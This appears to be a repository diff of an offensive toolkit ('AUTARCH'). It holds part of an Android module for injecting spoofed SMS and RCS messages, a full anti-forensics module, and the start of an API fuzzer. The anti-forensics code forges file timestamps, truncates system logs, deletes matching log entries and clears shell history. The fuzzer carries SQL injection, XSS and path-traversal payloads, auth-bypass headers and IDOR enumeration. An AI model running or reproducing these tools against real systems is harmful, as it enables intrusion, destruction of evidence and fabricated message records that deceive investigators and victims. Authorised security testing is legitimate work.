msg = {'address': parts[0].strip(), 'body': parts[1].strip()}
if len(parts) >= 3 and parts[2].strip():
msg['date'] = parts[2].strip()
if len(parts) >= 4 and parts[3].strip():
msg['time'] = parts[3].strip()
if len(parts) >= 5 and parts[4].strip():
msg['type'] = parts[4].strip()
messages.append(msg)
print(f" Queued: {msg['address']} -> {msg['body'][:30]}")
if not messages:
print(" No messages to insert.")
return
print(f"\n Inserting {len(messages)} messages...")
result = self.mgr.sms_bulk_insert(self.serial, messages)
print(f" Done: {result['inserted']}/{result['total']} inserted successfully.")
def edit_sms(self):
if not self._ensure_device():
return
try:
sms_id = input(" SMS _id to edit: ").strip()
if not sms_id:
return
print(" Leave fields blank to keep current value.")
body = input(" New body (or Enter to skip): ").strip() or None
address = input(" New address (or Enter to skip): ").strip() or None
date = input(" New date YYYY-MM-DD (or Enter): ").strip() or None
time_val = input(" New time HH:MM:SS (or Enter): ").strip() or None
msg_type = input(" New type inbox/sent (or Enter): ").strip() or None
except (EOFError, KeyboardInterrupt):
return
result = self.mgr.sms_update(self.serial, sms_id, body=body, address=address,
date_str=date, time_str=time_val, msg_type=msg_type)
if result['success']:
print(f" SMS {sms_id} updated.")
else:
print(f" Error: {result.get('error', 'Failed')}")
def delete_by_id(self):
if not self._ensure_device():
return
try:
sms_id = input(" SMS _id to delete: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not sms_id:
return
result = self.mgr.sms_delete(self.serial, sms_id=sms_id)
if result['success']:
print(f" Deleted SMS #{sms_id}")
else:
print(f" Error: {result.get('error', result.get('output', 'Failed'))}")
def delete_by_number(self):
if not self._ensure_device():
return
try:
address = input(" Phone number to delete all messages from: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not address:
return
try:
confirm = input(f" Delete ALL SMS from {address}? [y/N]: ").strip().lower()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'y':
print(" Cancelled.")
return
result = self.mgr.sms_delete(self.serial, address=address, delete_all_from=True)
if result['success']:
print(f" Deleted all SMS from {address}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def delete_all(self):
if not self._ensure_device():
return
try:
confirm = input(" DELETE ALL SMS on device? Type 'YES': ").strip()
except (EOFError, KeyboardInterrupt):
return
if confirm != 'YES':
print(" Cancelled.")
return
result = self.mgr.sms_delete_all(self.serial)
if result['success']:
print(" All SMS deleted.")
else:
print(f" Error: {result.get('output', 'Failed')}")
def rcs_check(self):
if not self._ensure_device():
return
print(" Checking RCS support...")
info = self.mgr.rcs_check_support(self.serial)
print(f"\n RCS Available: {'YES' if info['rcs_available'] else 'NO'}")
print(f" Messaging App: {info.get('messaging_app', 'not found')}")
print(f" Database: {info.get('database', 'not found (need root)')}")
def rcs_list_msgs(self):
if not self._ensure_device():
return
try:
limit = input(" Limit [50]: ").strip()
limit = int(limit) if limit else 50
except (EOFError, KeyboardInterrupt, ValueError):
return
print(" Fetching RCS messages (requires root)...")
result = self.mgr.rcs_list(self.serial, limit=limit)
if not result['success']:
print(f" Error: {result.get('error', 'Failed')}")
return
print(f"\n Found {result['count']} messages:")
print(f" {'ID':<6} {'Proto':<6} {'Date':<20} {'Conv':<20} Text")
print(f" {'-'*80}")
for m in result['messages']:
text = m.get('text', '')
if len(text) > 35:
text = text[:35] + '...'
conv = m.get('conversation_name', '')[:18]
print(f" {m.get('message_id','?'):<6} {m.get('protocol','?'):<6} {m.get('timestamp_readable','?'):<20} {conv:<20} {text}")
def rcs_insert_msg(self):
if not self._ensure_device():
return
try:
print("\n Insert Spoofed RCS Message (requires root)")
print(f" {'-'*45}")
address = input(" Phone number / contact: ").strip()
if not address:
return
body = input(" Message body: ").strip()
if not body:
return
sender = input(" Sender display name (or Enter for number): ").strip() or None
direction = input(" Direction - incoming/outgoing [incoming]: ").strip().lower()
is_out = direction.startswith('out')
date = input(" Date (YYYY-MM-DD) [today]: ").strip() or None
time_val = input(" Time (HH:MM:SS) [now]: ").strip() or None
except (EOFError, KeyboardInterrupt):
return
print(" Injecting RCS message...")
result = self.mgr.rcs_insert(self.serial, address, body,
date_str=date, time_str=time_val,
sender_name=sender, is_outgoing=is_out)
if result['success']:
print(f" RCS message injected:")
print(f" Address: {result['address']}")
print(f" Date: {result['date']}")
print(f" Protocol: {result['protocol']}")
print(f" Dir: {'outgoing' if result['is_outgoing'] else 'incoming'}")
print(f" Body: {result['body'][:60]}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def rcs_delete_msg(self):
if not self._ensure_device():
return
try:
msg_id = input(" RCS message _id to delete: ").strip()
except (EOFError, KeyboardInterrupt):
return
if not msg_id:
return
print(" Deleting RCS message (requires root)...")
result = self.mgr.rcs_delete(self.serial, int(msg_id))
if result['success']:
print(f" Deleted RCS message #{msg_id}")
else:
print(f" Error: {result.get('error', 'Failed')}")
def run_interactive(self):
while True:
self.show_menu()
try:
choice = input(" Select > ").strip().lower()
except (EOFError, KeyboardInterrupt):
break
if choice == '0':
break
actions = {
'1': self.list_sms,
'2': self.insert_sms,
'3': self.insert_batch,
'4': self.edit_sms,
'5': self.delete_by_id,
'6': self.delete_by_number,
'7': self.delete_all,
'8': self.rcs_check,
'9': self.rcs_list_msgs,
'a': self.rcs_insert_msg,
'b': self.rcs_delete_msg,
's': self._select_device,
}
action = actions.get(choice)
if action:
action()
else:
print(" Invalid choice.")
def run():
m = AndroidSms()
m.run_interactive()

580
modules/anti_forensics.py Normal file
View File

@@ -0,0 +1,580 @@
"""AUTARCH Anti-Forensics
Secure file deletion, timestamp manipulation, log clearing, metadata scrubbing,
and counter-forensics techniques for operational security.
"""
DESCRIPTION = "Anti-forensics & counter-investigation tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "counter"
import os
import re
import json
import time
import struct
import shutil
import secrets
import subprocess
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
try:
from core.paths import find_tool, get_data_dir
except ImportError:
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
try:
from PIL import Image as PILImage
HAS_PIL = True
except ImportError:
HAS_PIL = False
# ── Secure Deletion ─────────────────────────────────────────────────────────
class SecureDelete:
"""Secure file/directory deletion with overwrite patterns."""
PATTERNS = {
'zeros': b'\x00',
'ones': b'\xFF',
'random': None, # Generated per-pass
'dod_3pass': [b'\x00', None, b'\xFF'], # DoD 5220.22-M simplified
'gutmann': None, # 35 passes with specific patterns
}
@staticmethod
def secure_delete_file(filepath: str, passes: int = 3,
method: str = 'random') -> Dict:
"""Securely delete a file by overwriting before unlinking."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
file_size = os.path.getsize(filepath)
if method == 'dod_3pass':
patterns = [b'\x00', None, b'\xFF']
else:
patterns = [None] * passes # All random
# Overwrite passes
for i, pattern in enumerate(patterns):
with open(filepath, 'r+b') as f:
remaining = file_size
while remaining > 0:
chunk_size = min(4096, remaining)
if pattern is None:
chunk = secrets.token_bytes(chunk_size)
else:
chunk = pattern * chunk_size
f.write(chunk[:chunk_size])
remaining -= chunk_size
f.flush()
os.fsync(f.fileno())
# Truncate to zero
with open(filepath, 'w') as f:
pass
# Rename to random name before deletion (anti-filename recovery)
directory = os.path.dirname(filepath)
random_name = os.path.join(directory, secrets.token_hex(16))
os.rename(filepath, random_name)
os.unlink(random_name)
return {
'ok': True,
'file': filepath,
'size': file_size,
'passes': len(patterns),
'method': method,
'message': f'Securely deleted {filepath} ({file_size} bytes, {len(patterns)} passes)'
}
except PermissionError:
return {'ok': False, 'error': 'Permission denied'}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def secure_delete_directory(dirpath: str, passes: int = 3) -> Dict:
"""Recursively securely delete all files in a directory."""
if not os.path.isdir(dirpath):
return {'ok': False, 'error': 'Directory not found'}
deleted = 0
errors = 0
for root, dirs, files in os.walk(dirpath, topdown=False):
for name in files:
filepath = os.path.join(root, name)
result = SecureDelete.secure_delete_file(filepath, passes)
if result['ok']:
deleted += 1
else:
errors += 1
for name in dirs:
try:
os.rmdir(os.path.join(root, name))
except OSError:
errors += 1
try:
os.rmdir(dirpath)
except OSError:
errors += 1
return {
'ok': True,
'directory': dirpath,
'files_deleted': deleted,
'errors': errors
}
@staticmethod
def wipe_free_space(mount_point: str, passes: int = 1) -> Dict:
"""Fill free space with random data then delete (anti-carving)."""
try:
temp_file = os.path.join(mount_point, f'.wipe_{secrets.token_hex(8)}')
chunk_size = 1024 * 1024 # 1MB
written = 0
with open(temp_file, 'wb') as f:
try:
while True:
f.write(secrets.token_bytes(chunk_size))
written += chunk_size
f.flush()
except (OSError, IOError):
pass # Disk full — expected
os.unlink(temp_file)
return {
'ok': True,
'mount_point': mount_point,
'wiped_bytes': written,
'wiped_mb': round(written / (1024*1024), 1)
}
except Exception as e:
# Clean up temp file
if os.path.exists(temp_file):
os.unlink(temp_file)
return {'ok': False, 'error': str(e)}
# ── Timestamp Manipulation ───────────────────────────────────────────────────
class TimestampManip:
"""File timestamp modification for counter-forensics."""
@staticmethod
def get_timestamps(filepath: str) -> Dict:
"""Get file timestamps."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
stat = os.stat(filepath)
return {
'ok': True,
'file': filepath,
'accessed': datetime.fromtimestamp(stat.st_atime, timezone.utc).isoformat(),
'modified': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
'created': datetime.fromtimestamp(stat.st_ctime, timezone.utc).isoformat(),
'atime': stat.st_atime,
'mtime': stat.st_mtime,
'ctime': stat.st_ctime
}
@staticmethod
def set_timestamps(filepath: str, accessed: float = None,
modified: float = None) -> Dict:
"""Set file access and modification timestamps."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
stat = os.stat(filepath)
atime = accessed if accessed is not None else stat.st_atime
mtime = modified if modified is not None else stat.st_mtime
os.utime(filepath, (atime, mtime))
return {
'ok': True,
'file': filepath,
'accessed': datetime.fromtimestamp(atime, timezone.utc).isoformat(),
'modified': datetime.fromtimestamp(mtime, timezone.utc).isoformat()
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def clone_timestamps(source: str, target: str) -> Dict:
"""Copy timestamps from one file to another."""
if not os.path.exists(source):
return {'ok': False, 'error': 'Source file not found'}
if not os.path.exists(target):
return {'ok': False, 'error': 'Target file not found'}
try:
stat = os.stat(source)
os.utime(target, (stat.st_atime, stat.st_mtime))
return {
'ok': True,
'source': source,
'target': target,
'message': 'Timestamps cloned'
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def randomize_timestamps(filepath: str, start_epoch: float = None,
end_epoch: float = None) -> Dict:
"""Set random timestamps within a range."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
if start_epoch is None:
start_epoch = time.time() - 365 * 24 * 3600 # 1 year ago
if end_epoch is None:
end_epoch = time.time()
import random
atime = random.uniform(start_epoch, end_epoch)
mtime = random.uniform(start_epoch, end_epoch)
return TimestampManip.set_timestamps(filepath, atime, mtime)
# ── Log Clearing ─────────────────────────────────────────────────────────────
class LogCleaner:
"""System log manipulation and clearing."""
COMMON_LOG_PATHS = [
'/var/log/auth.log', '/var/log/syslog', '/var/log/messages',
'/var/log/kern.log', '/var/log/daemon.log', '/var/log/secure',
'/var/log/wtmp', '/var/log/btmp', '/var/log/lastlog',
'/var/log/faillog', '/var/log/apache2/access.log',
'/var/log/apache2/error.log', '/var/log/nginx/access.log',
'/var/log/nginx/error.log', '/var/log/mysql/error.log',
]
@staticmethod
def list_logs() -> List[Dict]:
"""List available log files."""
logs = []
for path in LogCleaner.COMMON_LOG_PATHS:
if os.path.exists(path):
try:
stat = os.stat(path)
logs.append({
'path': path,
'size': stat.st_size,
'modified': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
'writable': os.access(path, os.W_OK)
})
except OSError:
pass
return logs
@staticmethod
def clear_log(filepath: str) -> Dict:
"""Clear a log file (truncate to zero)."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
original_size = os.path.getsize(filepath)
with open(filepath, 'w') as f:
pass
return {
'ok': True,
'file': filepath,
'cleared_bytes': original_size
}
except PermissionError:
return {'ok': False, 'error': 'Permission denied (need root?)'}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def remove_entries(filepath: str, pattern: str) -> Dict:
"""Remove specific entries matching a pattern from log file."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
with open(filepath, 'r', errors='ignore') as f:
lines = f.readlines()
original_count = len(lines)
filtered = [l for l in lines if not re.search(pattern, l, re.I)]
removed = original_count - len(filtered)
with open(filepath, 'w') as f:
f.writelines(filtered)
return {
'ok': True,
'file': filepath,
'original_lines': original_count,
'removed': removed,
'remaining': len(filtered)
}
except PermissionError:
return {'ok': False, 'error': 'Permission denied'}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def clear_bash_history() -> Dict:
"""Clear bash history."""
results = []
history_files = [
os.path.expanduser('~/.bash_history'),
os.path.expanduser('~/.zsh_history'),
os.path.expanduser('~/.python_history'),
]
for hf in history_files:
if os.path.exists(hf):
try:
size = os.path.getsize(hf)
with open(hf, 'w') as f:
pass
results.append({'file': hf, 'cleared': size})
except Exception:
pass
# Also clear in-memory history
try:
subprocess.run(['history', '-c'], shell=True, capture_output=True)
except Exception:
pass
return {'ok': True, 'cleared': results}
# ── Metadata Scrubbing ───────────────────────────────────────────────────────
class MetadataScrubber:
"""Remove identifying metadata from files."""
@staticmethod
def scrub_image(filepath: str, output: str = None) -> Dict:
"""Remove EXIF data from image."""
if not HAS_PIL:
return {'ok': False, 'error': 'Pillow not installed'}
try:
img = PILImage.open(filepath)
# Create clean copy without EXIF
clean = PILImage.new(img.mode, img.size)
clean.putdata(list(img.getdata()))
out_path = output or filepath
clean.save(out_path)
return {
'ok': True,
'file': out_path,
'message': 'EXIF data removed'
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def scrub_pdf_metadata(filepath: str) -> Dict:
"""Remove metadata from PDF (basic — rewrites info dict)."""
try:
with open(filepath, 'rb') as f:
data = f.read()
# Remove common metadata keys
for key in [b'/Author', b'/Creator', b'/Producer',
b'/Title', b'/Subject', b'/Keywords']:
# Simple regex replacement of metadata values
pattern = key + rb'\s*\([^)]*\)'
data = re.sub(pattern, key + b' ()', data)
with open(filepath, 'wb') as f:
f.write(data)
return {'ok': True, 'file': filepath, 'message': 'PDF metadata scrubbed'}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Anti-Forensics Manager ──────────────────────────────────────────────────
class AntiForensicsManager:
"""Unified interface for anti-forensics operations."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'anti_forensics')
os.makedirs(self.data_dir, exist_ok=True)
self.delete = SecureDelete()
self.timestamps = TimestampManip()
self.logs = LogCleaner()
self.scrubber = MetadataScrubber()
self.audit_log: List[Dict] = []
def _log_action(self, action: str, target: str, details: str = ''):
"""Internal audit log (ironic for anti-forensics)."""
self.audit_log.append({
'timestamp': datetime.now(timezone.utc).isoformat(),
'action': action,
'target': target,
'details': details
})
def get_capabilities(self) -> Dict:
"""Check available capabilities."""
return {
'secure_delete': True,
'timestamp_manip': True,
'log_clearing': True,
'metadata_scrub_image': HAS_PIL,
'metadata_scrub_pdf': True,
'free_space_wipe': True,
}
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_anti_forensics() -> AntiForensicsManager:
global _instance
if _instance is None:
_instance = AntiForensicsManager()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for Anti-Forensics module."""
mgr = get_anti_forensics()
while True:
print(f"\n{'='*60}")
print(f" Anti-Forensics Toolkit")
print(f"{'='*60}")
print()
print(" 1 — Secure Delete File")
print(" 2 — Secure Delete Directory")
print(" 3 — Wipe Free Space")
print(" 4 — View File Timestamps")
print(" 5 — Set Timestamps")
print(" 6 — Clone Timestamps")
print(" 7 — Randomize Timestamps")
print(" 8 — List System Logs")
print(" 9 — Clear Log File")
print(" 10 — Remove Log Entries (pattern)")
print(" 11 — Clear Shell History")
print(" 12 — Scrub Image Metadata")
print(" 13 — Scrub PDF Metadata")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
path = input(" File path: ").strip()
passes = input(" Overwrite passes (default 3): ").strip()
if path:
result = mgr.delete.secure_delete_file(path, int(passes) if passes.isdigit() else 3)
print(f" {result.get('message', result.get('error'))}")
elif choice == '2':
path = input(" Directory path: ").strip()
if path:
confirm = input(f" DELETE ALL in {path}? (yes/no): ").strip()
if confirm == 'yes':
result = mgr.delete.secure_delete_directory(path)
print(f" Deleted {result.get('files_deleted', 0)} files, {result.get('errors', 0)} errors")
elif choice == '3':
mount = input(" Mount point: ").strip()
if mount:
result = mgr.delete.wipe_free_space(mount)
if result['ok']:
print(f" Wiped {result['wiped_mb']} MB of free space")
else:
print(f" Error: {result['error']}")
elif choice == '4':
path = input(" File path: ").strip()
if path:
result = mgr.timestamps.get_timestamps(path)
if result['ok']:
print(f" Accessed: {result['accessed']}")
print(f" Modified: {result['modified']}")
print(f" Created: {result['created']}")
elif choice == '5':
path = input(" File path: ").strip()
date_str = input(" Date (YYYY-MM-DD HH:MM:SS): ").strip()
if path and date_str:
try:
ts = datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S').timestamp()
result = mgr.timestamps.set_timestamps(path, ts, ts)
print(f" Timestamps set to {date_str}")
except ValueError:
print(" Invalid date format")
elif choice == '6':
source = input(" Source file: ").strip()
target = input(" Target file: ").strip()
if source and target:
result = mgr.timestamps.clone_timestamps(source, target)
print(f" {result.get('message', result.get('error'))}")
elif choice == '7':
path = input(" File path: ").strip()
if path:
result = mgr.timestamps.randomize_timestamps(path)
if result['ok']:
print(f" Set to: {result.get('modified', '?')}")
elif choice == '8':
logs = mgr.logs.list_logs()
for l in logs:
writable = 'writable' if l['writable'] else 'read-only'
print(f" {l['path']} ({l['size']} bytes) [{writable}]")
elif choice == '9':
path = input(" Log file path: ").strip()
if path:
result = mgr.logs.clear_log(path)
if result['ok']:
print(f" Cleared {result['cleared_bytes']} bytes")
else:
print(f" {result['error']}")
elif choice == '10':
path = input(" Log file path: ").strip()
pattern = input(" Pattern to remove: ").strip()
if path and pattern:
result = mgr.logs.remove_entries(path, pattern)
if result['ok']:
print(f" Removed {result['removed']} of {result['original_lines']} lines")
else:
print(f" {result['error']}")
elif choice == '11':
result = mgr.logs.clear_bash_history()
for c in result['cleared']:
print(f" Cleared {c['file']} ({c['cleared']} bytes)")
elif choice == '12':
path = input(" Image path: ").strip()
if path:
result = mgr.scrubber.scrub_image(path)
print(f" {result.get('message', result.get('error'))}")
elif choice == '13':
path = input(" PDF path: ").strip()
if path:
result = mgr.scrubber.scrub_pdf_metadata(path)
print(f" {result.get('message', result.get('error'))}")

742
modules/api_fuzzer.py Normal file
View File

@@ -0,0 +1,742 @@
"""AUTARCH API Fuzzer
Endpoint discovery, parameter fuzzing, auth testing, rate limit detection,
GraphQL introspection, and response analysis for REST/GraphQL APIs.
"""
DESCRIPTION = "API endpoint fuzzing & vulnerability testing"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import copy
import threading
from pathlib import Path
from urllib.parse import urljoin, urlparse, parse_qs
from typing import Dict, List, Optional, Any, Tuple
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
try:
import requests
from requests.exceptions import RequestException
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
# ── Fuzz Payloads ────────────────────────────────────────────────────────────
SQLI_PAYLOADS = [
"' OR '1'='1", "\" OR \"1\"=\"1", "'; DROP TABLE--", "1; SELECT 1--",
"' UNION SELECT NULL--", "1' AND '1'='1", "admin'--", "' OR 1=1#",
"1 AND 1=1", "1' ORDER BY 1--", "') OR ('1'='1",
]
XSS_PAYLOADS = [
"<script>alert(1)</script>", "'\"><img src=x onerror=alert(1)>",
"javascript:alert(1)", "<svg/onload=alert(1)>", "{{7*7}}",
"${7*7}", "<%=7*7%>", "{{constructor.constructor('return 1')()}}",
]
TYPE_CONFUSION = [
None, True, False, 0, -1, 2147483647, -2147483648,
99999999999999, 0.1, -0.1, float('inf'),
"", " ", "null", "undefined", "NaN", "true", "false",
[], {}, [None], {"__proto__": {}},
"A" * 1000, "A" * 10000,
]
TRAVERSAL_PAYLOADS = [
"../../../etc/passwd", "..\\..\\..\\windows\\system32\\config\\sam",
"....//....//....//etc/passwd", "%2e%2e%2f%2e%2e%2f",
"/etc/passwd%00", "..%252f..%252f",
]
COMMON_ENDPOINTS = [
'/api', '/api/v1', '/api/v2', '/api/v3',
'/api/users', '/api/admin', '/api/login', '/api/auth',
'/api/config', '/api/settings', '/api/debug', '/api/health',
'/api/status', '/api/info', '/api/version', '/api/docs',
'/api/swagger', '/api/graphql', '/api/internal',
'/swagger.json', '/swagger-ui', '/openapi.json',
'/api/tokens', '/api/keys', '/api/secrets',
'/api/upload', '/api/download', '/api/export', '/api/import',
'/api/search', '/api/query', '/api/execute', '/api/run',
'/graphql', '/graphiql', '/playground',
'/.well-known/openid-configuration',
'/api/password/reset', '/api/register', '/api/verify',
'/api/webhook', '/api/callback', '/api/notify',
'/actuator', '/actuator/health', '/actuator/env',
'/metrics', '/prometheus', '/_debug', '/__debug__',
]
# ── API Fuzzer Engine ────────────────────────────────────────────────────────
class APIFuzzer:
"""REST & GraphQL API security testing."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'api_fuzzer')
os.makedirs(self.data_dir, exist_ok=True)
self.session = requests.Session() if HAS_REQUESTS else None
self.results: List[Dict] = []
self._jobs: Dict[str, Dict] = {}
def set_auth(self, auth_type: str, value: str, header_name: str = 'Authorization'):
"""Configure authentication for requests."""
if not self.session:
return
if auth_type == 'bearer':
self.session.headers[header_name] = f'Bearer {value}'
elif auth_type == 'api_key':
self.session.headers[header_name] = value
elif auth_type == 'basic':
parts = value.split(':', 1)
if len(parts) == 2:
self.session.auth = (parts[0], parts[1])
elif auth_type == 'cookie':
self.session.cookies.set('session', value)
elif auth_type == 'custom':
self.session.headers[header_name] = value
def clear_auth(self):
"""Clear authentication."""
if self.session:
self.session.headers.pop('Authorization', None)
self.session.auth = None
self.session.cookies.clear()
# ── Endpoint Discovery ───────────────────────────────────────────────
def discover_endpoints(self, base_url: str, custom_paths: List[str] = None,
threads: int = 10) -> str:
"""Discover API endpoints. Returns job_id."""
job_id = f'discover_{int(time.time())}'
self._jobs[job_id] = {
'type': 'discover', 'status': 'running',
'found': [], 'checked': 0, 'total': 0
}
def _discover():
paths = COMMON_ENDPOINTS + (custom_paths or [])
self._jobs[job_id]['total'] = len(paths)
found = []
def check_path(path):
try:
url = urljoin(base_url.rstrip('/') + '/', path.lstrip('/'))
resp = self.session.get(url, timeout=5, allow_redirects=False)
self._jobs[job_id]['checked'] += 1
if resp.status_code < 404:
entry = {
'path': path,
'url': url,
'status': resp.status_code,
'content_type': resp.headers.get('content-type', ''),
'size': len(resp.content),
'methods': []
}
# Check allowed methods via OPTIONS
try:
opts = self.session.options(url, timeout=3)
allow = opts.headers.get('Allow', '')
if allow:
entry['methods'] = [m.strip() for m in allow.split(',')]
except Exception:
pass
found.append(entry)
except Exception:
self._jobs[job_id]['checked'] += 1
# Thread pool
active_threads = []
for path in paths:
t = threading.Thread(target=check_path, args=(path,))
t.start()
active_threads.append(t)
if len(active_threads) >= threads:
for at in active_threads:
at.join(timeout=10)
active_threads.clear()
for t in active_threads:
t.join(timeout=10)
self._jobs[job_id]['found'] = found
self._jobs[job_id]['status'] = 'complete'
threading.Thread(target=_discover, daemon=True).start()
return job_id
def parse_openapi(self, url_or_path: str) -> Dict:
"""Parse OpenAPI/Swagger spec to extract endpoints."""
try:
if url_or_path.startswith('http'):
resp = self.session.get(url_or_path, timeout=10)
spec = resp.json()
else:
with open(url_or_path) as f:
spec = json.load(f)
endpoints = []
paths = spec.get('paths', {})
for path, methods in paths.items():
for method, details in methods.items():
if method.upper() in ('GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS'):
params = []
for p in details.get('parameters', []):
params.append({
'name': p.get('name'),
'in': p.get('in'),
'required': p.get('required', False),
'type': p.get('schema', {}).get('type', 'string')
})
endpoints.append({
'path': path,
'method': method.upper(),
'summary': details.get('summary', ''),
'parameters': params,
'tags': details.get('tags', [])
})
return {
'ok': True,
'title': spec.get('info', {}).get('title', ''),
'version': spec.get('info', {}).get('version', ''),
'endpoints': endpoints,
'count': len(endpoints)
}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Parameter Fuzzing ────────────────────────────────────────────────
def fuzz_params(self, url: str, method: str = 'GET',
params: Dict = None, payload_type: str = 'type_confusion') -> Dict:
"""Fuzz API parameters with various payloads."""
if not self.session:
return {'ok': False, 'error': 'requests not available'}
if payload_type == 'sqli':
payloads = SQLI_PAYLOADS
elif payload_type == 'xss':
payloads = XSS_PAYLOADS
elif payload_type == 'traversal':
payloads = TRAVERSAL_PAYLOADS
else:
payloads = TYPE_CONFUSION
params = params or {}
findings = []
for param_name, original_value in params.items():
for payload in payloads:
fuzzed = copy.deepcopy(params)
fuzzed[param_name] = payload
try:
if method.upper() == 'GET':
resp = self.session.get(url, params=fuzzed, timeout=10)
else:
resp = self.session.request(method.upper(), url, json=fuzzed, timeout=10)
# Analyze response for anomalies
finding = self._analyze_fuzz_response(
resp, param_name, payload, payload_type
)
if finding:
findings.append(finding)
except RequestException as e:
if 'timeout' not in str(e).lower():
findings.append({
'param': param_name,
'payload': str(payload),
'type': 'error',
'detail': str(e)
})
return {'ok': True, 'findings': findings, 'tested': len(params) * len(payloads)}
def _analyze_fuzz_response(self, resp, param: str, payload, payload_type: str) -> Optional[Dict]:
"""Analyze response for vulnerability indicators."""
body = resp.text.lower()
finding = None
# SQL error detection
sql_errors = [
'sql syntax', 'mysql_fetch', 'pg_query', 'sqlite3',
'unclosed quotation', 'unterminated string', 'syntax error',
'odbc', 'oracle error', 'microsoft ole db', 'ora-0'
]
if payload_type == 'sqli' and any(e in body for e in sql_errors):
finding = {
'param': param, 'payload': str(payload),
'type': 'sqli', 'severity': 'high',
'detail': 'SQL error in response',
'status': resp.status_code
}
# XSS reflection
if payload_type == 'xss' and str(payload).lower() in body:
finding = {
'param': param, 'payload': str(payload),
'type': 'xss_reflected', 'severity': 'high',
'detail': 'Payload reflected in response',
'status': resp.status_code
}
# Path traversal
if payload_type == 'traversal':
traversal_indicators = ['root:', '/bin/', 'windows\\system32', '[boot loader]']
if any(t in body for t in traversal_indicators):
finding = {
'param': param, 'payload': str(payload),
'type': 'path_traversal', 'severity': 'critical',
'detail': 'File content in response',
'status': resp.status_code
}
# Server error (500) might indicate injection
if resp.status_code == 500 and not finding:
finding = {
'param': param, 'payload': str(payload),
'type': 'server_error', 'severity': 'medium',
'detail': f'Server error (500) triggered',
'status': resp.status_code
}
# Stack trace / debug info disclosure
debug_indicators = [
'traceback', 'stacktrace', 'exception', 'debug',
'at line', 'file "/', 'internal server error'
]
if any(d in body for d in debug_indicators) and not finding:
finding = {
'param': param, 'payload': str(payload),
'type': 'info_disclosure', 'severity': 'medium',
'detail': 'Debug/stack trace in response',
'status': resp.status_code
}
return finding
# ── Auth Testing ─────────────────────────────────────────────────────
def test_idor(self, url_template: str, id_range: Tuple[int, int],
auth_token: str = None) -> Dict:
"""Test for IDOR by iterating IDs."""
findings = []
start_id, end_id = id_range
if auth_token:
self.session.headers['Authorization'] = f'Bearer {auth_token}'
for i in range(start_id, end_id + 1):
url = url_template.replace('{id}', str(i))
try:
resp = self.session.get(url, timeout=5)
if resp.status_code == 200:
findings.append({
'id': i, 'url': url,
'status': resp.status_code,
'size': len(resp.content),
'accessible': True
})
elif resp.status_code not in (401, 403, 404):
findings.append({
'id': i, 'url': url,
'status': resp.status_code,
'accessible': False,
'note': f'Unexpected status: {resp.status_code}'
})
except Exception:
pass
return {
'ok': True, 'findings': findings,
'accessible_count': sum(1 for f in findings if f.get('accessible')),
'tested': end_id - start_id + 1
}
def test_auth_bypass(self, url: str) -> Dict:
"""Test common auth bypass techniques."""
bypasses = []
tests = [
('No auth header', {}),
('Empty Bearer', {'Authorization': 'Bearer '}),
('Bearer null', {'Authorization': 'Bearer null'}),
('Bearer undefined', {'Authorization': 'Bearer undefined'}),
('Admin header', {'X-Admin': 'true'}),
('Internal header', {'X-Forwarded-For': '127.0.0.1'}),
('Override method', {'X-HTTP-Method-Override': 'GET'}),
('Original URL', {'X-Original-URL': '/admin'}),
]
for name, headers in tests:
try:
resp = requests.get(url, headers=headers, timeout=5)
if resp.status_code == 200:
bypasses.append({
'technique': name,
'status': resp.status_code,
'size': len(resp.content),
'success': True
})
else:
bypasses.append({
'technique': name,
'status': resp.status_code,
'success': False
})
except Exception:
pass
return {
'ok': True,
'bypasses': bypasses,
'successful': sum(1 for b in bypasses if b.get('success'))
}
# ── Rate Limiting ────────────────────────────────────────────────────
def test_rate_limit(self, url: str, requests_count: int = 50,
method: str = 'GET') -> Dict:
"""Test API rate limiting."""
results = []
start_time = time.time()
for i in range(requests_count):
try:
resp = self.session.request(method, url, timeout=10)
results.append({
'request_num': i + 1,
'status': resp.status_code,
'time': time.time() - start_time,
'rate_limit_remaining': resp.headers.get('X-RateLimit-Remaining', ''),
'retry_after': resp.headers.get('Retry-After', '')
})
if resp.status_code == 429:
break
except Exception as e:
results.append({
'request_num': i + 1,
'error': str(e),
'time': time.time() - start_time
})
rate_limited = any(r.get('status') == 429 for r in results)
elapsed = time.time() - start_time
return {
'ok': True,
'rate_limited': rate_limited,
'total_requests': len(results),
